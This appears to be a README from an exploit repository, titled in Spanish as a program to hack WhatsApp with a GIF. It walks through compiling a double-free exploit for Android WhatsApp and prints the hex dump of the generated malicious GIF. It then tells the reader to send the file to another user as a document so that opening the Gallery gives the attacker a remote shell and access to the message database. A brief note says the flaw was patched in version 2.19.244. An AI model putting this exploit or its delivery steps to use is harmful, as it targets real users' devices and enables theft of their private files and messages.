
Programa para hackear Whatsapp Mediante Gif ,asiendo un exploit con el puerto.
The system address () and the gadget must be replaced by the real address found by an information disclosure vulnerability.
After replacing the system address () and the gadget. Run the code to generate the malicious GIF file:
notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B
Then copy the exploit.gif file and send it as a Document via WhatsApp to another WhatsApp user. Note that it should not be sent as a media file, otherwise WhatsApp tries to convert it to an MP4 before sending. Once the user receives the malicious GIF file, nothing will happen until the user opens the WhatsApp Gallery to send a media file to their friend.
#Instructions
WhatsApp GIF Attack Vectors (Mini news and Instructions at the End)
-----Mini News and INSTRUCTIONS----
WhatsApp GIF hacking can be executed in two ways
Local privilege stage (from a user application to WhatsApp): a malicious application is installed on the Android device. The application collects zygote library addresses and creates a malicious GIF file that results in code execution in WhatsApp. This allows the malware application to steal files from the WhatsApp sandbox, including the message database. Remote code execution: pairing with an application that has a remote memory information disclosure vulnerability. The attacker can collect the zygote library addresses and create a malicious GIF file to send to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker since WhatsApp tries to convert media files to MP4 and that would make your malicious GIF useless). As soon as the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in the context of WhatsApp. Must read: 4 Fitbit Hacks You Never Knew Before WhatsApp on the latest Android is hackable Android versions 8.1 and 9.0 are exploitable, while earlier versions are not. The researcher says the double-free bug could still be triggered on earlier OS versions, but a crash occurs before malicious code can be executed to perform an RCE. Malicious GIF that hacks WhatsApp Conclusion: Facebook acknowledged the security issue and fixed the problem in WhatsApp version 2.19.244. Although Facebook tried to make it seem like it is not a big exploit, while in reality it is quite nasty. As always, keep your applications updated and do not install unnecessary applications.
--------------------------------------------------------Steps---------------------------------------------------------------------------
Simply compile the code in this repository. The system address () and the gadget must be replaced by the real address, found by an information disclosure vulnerability that you must discover on your own using other techniques before the GIF can perform any RCE for you. Once you compile the code mentioned in the previous link, copy the contents into a GIF file and send it as a Document via WhatsApp to another WhatsApp user. Remember not to send it as a media file, otherwise WhatsApp tries to convert it to an MP4 before sending. Once the user receives the malicious GIF file, nothing will happen until the user opens the WhatsApp Gallery to send a media file to their friend.